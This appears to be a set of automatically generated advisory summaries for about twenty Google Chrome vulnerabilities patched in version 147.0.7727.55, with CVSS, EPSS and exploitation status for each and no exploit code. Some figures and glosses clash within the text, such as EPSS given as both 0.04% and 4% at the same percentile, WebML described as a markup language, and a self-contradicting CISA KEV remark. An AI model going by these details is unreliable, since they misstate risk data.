Google Chrome versions prior to 147.0.7727.55 contain a policy bypass vulnerability in the LocalNetworkAccess feature that allows remote attackers to circumvent navigation restrictions by delivering a crafted HTML page. An unauthenticated attacker requires only user interaction (clicking or viewing the malicious page) to trigger the bypass, resulting in integrity compromise of network access policies. EPSS exploitation probability is low at 0.02%, and no public exploit code or active exploitation has been reported.
Omnibox spoofing in Google Chrome prior to 147.0.7727.55 allows remote attackers with a compromised renderer process to spoof the URL bar contents via crafted HTML, deceiving users about the actual page origin. The vulnerability requires renderer process compromise (post-sandbox-escape condition) and user interaction, limiting real-world exploitation to multi-stage attacks. Patch available in Chrome 147.0.7727.55 and later; EPSS score of 0.03% reflects low autonomous exploitation likelihood despite medium CVSS rating.
Remote code execution in Google Chrome's ANGLE graphics layer on macOS prior to 147.0.7727.55 allows unauthenticated attackers to execute arbitrary code within the browser's sandbox via malicious HTML pages. The vulnerability stems from insufficient input validation (CWE-20) in ANGLE, Chrome's OpenGL ES implementation layer. While rated 8.8 CVSS due to complete confidentiality/integrity/availability impact, EPSS exploitation probability is low (0.05%, 16th percentile) with no public exploit identified at time of analysis and no confirmed active exploitation (CISA KEV).
UI spoofing via incorrect security UI rendering in Google Chrome's Blink engine allows remote attackers to deceive users into trusting malicious content through crafted HTML pages, affecting Chrome versions prior to 147.0.7727.55. The attack requires user interaction (clicking or viewing the malicious page) but no authentication. While assigned Medium severity by Google and carrying low EPSS exploitation probability (0.03%, 10th percentile), the integrity impact centers on user trust and phishing enablement rather than code execution.
Remote code execution within Chrome's sandbox affects all versions prior to 147.0.7727.55 through a use-after-free vulnerability in the browser's navigation component. Remote attackers can execute arbitrary code by delivering a specially crafted HTML page that triggers memory corruption when a user visits the malicious site. EPSS probability of 0.04% indicates low observed exploitation activity, and no CISA KEV listing confirms this is not confirmed actively exploited at time of analysis. Google has released patches in Chrome 147.0.7727.55.
Side-channel information leakage in Google Chrome's Navigation feature prior to version 147.0.7727.55 allows unauthenticated remote attackers to extract cross-origin data by serving a crafted HTML page. The vulnerability requires user interaction (clicking or navigating to a malicious page) but successfully bypasses same-origin policy protections, exposing sensitive information from different origins. With an EPSS score of 0.03% (10th percentile) indicating very low real-world exploitation probability, this represents a medium-severity information disclosure risk appropriate for routine patching rather than emergency mitigation.
UI spoofing via policy bypass in Blink rendering engine in Google Chrome prior to version 147.0.7727.55 allows remote attackers to deceive users through crafted HTML pages. The vulnerability requires user interaction (clicking or viewing) but needs no authentication, affecting all Chrome users on unpatched versions. Chromium security team rated this as Medium severity; EPSS score of 0.02% indicates low real-world exploitation probability despite public disclosure.
Use-after-free vulnerability in Google Chrome's PrivateAI component (versions prior to 147.0.7727.55) enables sandbox escape when remote attackers socially engineer victims into performing specific UI interactions with malicious HTML pages. Exploitation requires user engagement with attacker-controlled content but no authentication. CVSS 9.6 critical severity reflects potential for complete compromise of confidentiality, integrity, and availability with scope change indicating sandbox boundary violation. No public exploit identified at time of analysis; low observed exploitation activity (EPSS 0.03%).
Remote code execution in Google Chrome prior to 147.0.7727.55 allows attackers to execute arbitrary code within the browser sandbox through crafted HTML pages exploiting out-of-bounds read/write conditions in the V8 JavaScript engine. User interaction (visiting a malicious page) is required, but no authentication is needed. With CVSS 8.8 and low EPSS (0.04%, 11th percentile), this represents a high-severity browser vulnerability with limited observed real-world exploitation activity. Patch available in Chrome 147.0.7727.55. No public exploit identified at time of analysis.
Remote code execution in Google Chrome's Blink rendering engine (versions prior to 147.0.7727.55) allows unauthenticated attackers to execute arbitrary code within Chrome's sandbox by delivering a malicious HTML page that triggers a use-after-free vulnerability. While rated High severity (CVSS 8.8) due to complete confidentiality/integrity/availability impact, EPSS scoring places exploitation probability at only 4% (11th percentile), indicating low observed targeting in the wild. No confirmed active exploitation (not in CISA KEV) and no public proof-of-concept identified at time of analysis. Vendor-released patch available in Chrome 147.0.7727.55.
Remote code execution in Google Chrome versions prior to 147.0.7727.55 allows unauthenticated attackers to execute arbitrary code within the browser sandbox via a maliciously crafted HTML page exploiting a type confusion vulnerability in the V8 JavaScript engine. With CVSS 8.8 (High), network-based attack vector requiring only user interaction, and available vendor patch, this represents a significant but contained threat. EPSS score of 0.04% (11th percentile) indicates low observed exploitation probability, and no active exploitation or public POC is identified at time of analysis. The sandbox containment limits initial impact severity compared to full system compromise.
Remote code execution in Google Chrome's Skia graphics library (versions prior to 147.0.7727.55) allows remote attackers to execute arbitrary code within the browser's sandbox via specially crafted HTML pages exploiting an integer overflow vulnerability. Google patched this high-severity flaw in Chrome 147.0.7727.55 released April 2026. No active exploitation confirmed (not on CISA KEV), with low EPSS score (0.04%, 11th percentile) indicating minimal observed exploitation activity. Exploitation requires user interaction (visiting malicious webpage) but no authentication, making it viable for drive-by attacks against unpatched Chrome installations.
Heap buffer overflow in WebML (a web markup language component) in Google Chrome prior to version 147.0.7727.55 allows remote attackers to obtain potentially sensitive information from process memory by serving a crafted HTML page. The vulnerability requires no user authentication and can be triggered through normal web browsing, though exploitation has a low probability (EPSS 0.03%) and no public exploit code has been identified.
Arbitrary code execution in Google Chrome for macOS versions prior to 147.0.7727.55 occurs via heap buffer overflow in the ANGLE graphics layer when processing malicious HTML pages. Remote attackers can achieve full compromise of confidentiality, integrity, and availability within Chrome's sandbox by exploiting this CWE-122 heap overflow with low attack complexity and no authentication. EPSS probability is low (0.03%, 10th percentile) with no public exploit identified at time of analysis, indicating limited observed exploitation activity despite the high CVSS score of 8.8.
Heap buffer overflow in WebML component of Google Chrome prior to version 147.0.7727.55 allows unauthenticated remote attackers to read sensitive information from process memory via a specially crafted HTML page. The vulnerability requires no user authentication and only user interaction (page visit), with a CVSS score of 6.5 reflecting confidentiality impact and limited availability risk. No public exploit code or active exploitation has been confirmed at time of analysis, though a vendor patch is available.
Remote code execution in Google Chrome Media component (versions prior to 147.0.7727.55) enables unauthenticated attackers to execute arbitrary code within Chrome's sandbox via specially crafted HTML pages. Exploitation requires user interaction to visit a malicious site. The use-after-free memory corruption vulnerability achieves high confidentiality, integrity, and availability impact within the sandboxed environment. No public exploit identified at time of analysis.
Remote code execution within Chrome's V8 JavaScript sandbox affects Google Chrome versions prior to 147.0.7727.55 through a type confusion vulnerability. Attackers can execute arbitrary code by convincing users to visit a malicious webpage, requiring no authentication. Vendor-released patch available (Chrome 147.0.7727.55). No public exploit identified at time of analysis, with EPSS probability at 0.04% (11th percentile) indicating low observed exploitation likelihood despite high CVSS score of 8.8.
Heap buffer overflow in Google Chrome's WebAudio component prior to version 147.0.7727.55 allows unauthenticated remote attackers to read sensitive information from process memory by serving a crafted HTML page. The vulnerability has a CVSS score of 6.5 and EPSS probability of 0.03% (8th percentile), indicating low real-world exploitation likelihood despite the network attack vector and lack of user interaction requirements. Vendor-released patch is available.
Remote code execution in Google Chrome's V8 JavaScript engine (versions prior to 147.0.7727.55) allows attackers to execute arbitrary code within the browser sandbox via malicious HTML pages. Publicly available exploit code exists. While CVSS scored 8.8 (High), EPSS indicates low exploitation probability (0.04%, 11th percentile), suggesting limited real-world targeting despite proof-of-concept availability. No CISA KEV listing confirms active exploitation campaigns.
Remote code execution in Google Chrome versions prior to 147.0.7727.55 allows unauthenticated attackers to execute arbitrary code within the browser's sandbox through a crafted HTML page exploiting an inappropriate implementation in the V8 JavaScript engine. User interaction is required (visiting a malicious webpage). No public exploit identified at time of analysis, with EPSS exploitation probability at 0.04% (11th percentile), indicating low observed attacker interest despite high CVSS severity.
Remote code execution in Google Chrome's V8 JavaScript engine (versions prior to 147.0.7727.55) allows unauthenticated remote attackers to execute arbitrary code within the sandbox by exploiting a use-after-free memory corruption vulnerability through a malicious HTML page. User interaction (visiting a crafted website) is required. No public exploit identified at time of analysis, with EPSS probability at 4% (11th percentile), indicating relatively low immediate exploitation risk despite high CVSS severity.